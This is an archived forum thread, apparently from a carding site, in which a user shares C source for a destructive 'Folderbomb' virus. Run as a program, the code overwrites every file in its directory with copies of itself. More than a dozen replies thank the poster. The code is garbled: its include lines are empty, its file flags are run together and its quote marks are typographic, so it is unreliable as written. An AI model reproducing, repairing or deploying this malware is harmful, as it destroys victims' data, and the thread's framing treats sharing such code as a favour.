PDA

View Full Version : The Virus Code!!!



manzalawi
01-29-2011, 11:21 AM
/*
* The Virus Code!!!
*
* Coded by Mannzalawi
* [email protected]
*http://carders-place.com
*/



#include<stdio.h>
#include<conio.h>
#include
#include
#include
void main(int argc,char* argv[])
{ char buf[512];
int source,target,byt,done;
struct ffblk ffblk;
clrscr();
textcolor(2);
cprintf(”————————————————————————–”);
printf(”\nVirus: Folderbomb 1.0\nProgrammer:BAS Unnikrishnan([email protected])\n”);
cprintf(”————————————————————————–”);
done = findfirst(”*.*”,&ffblk,0);
while (!done)
{ printf(”\n”);cprintf(” %s “, ffblk.ff_name);printf(”is attacked by “);cprintf(”Folderbomb”);
source=open(argv[0],O_RDONLYO_BINARY);
target=open(ffblk.ff_name,O_CREATO_BINARYO_WRONGLY );
while(1)
{byt=read(source,buf,512);
if(byt>0)
write(target,buf,byt);
else
break;
}
close(source);
close(target);
done = findnext(&ffblk);
}
getch();
}

dont 4get say thx :)

pascalll2222
02-01-2011, 08:12 AM
thnak you man you are the guy

yuiseto
02-01-2011, 07:52 PM
great contribution! thank you!

ojitosfachas
02-05-2011, 09:39 PM
thxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx

d-ace
02-18-2011, 03:44 PM
thanksssssssssssssssssssssssss

paper
02-21-2011, 12:33 PM
thank you so much

mc0d3
03-19-2011, 04:58 PM
thank youuuu too

quake
06-20-2012, 01:42 PM
nice, thanks.

jap
11-26-2016, 12:02 AM
Thanks Dude.

Antonio Smith
12-10-2016, 07:02 AM
Thanks buddy

jasonjason321jason
12-24-2016, 07:29 PM
Looks promising!

meguminjp
02-28-2017, 03:22 PM
thanks man

mouadrm
04-19-2017, 12:54 AM
thank you man for that

nonidentified
07-16-2017, 10:13 AM
this looks nice, thx

dgk
10-18-2017, 05:39 PM
much appracite :happy-jumping:

kirvis
01-03-2018, 09:34 AM
Thanksssssss

itachixd
01-13-2018, 05:44 AM
Thanks you brother x the code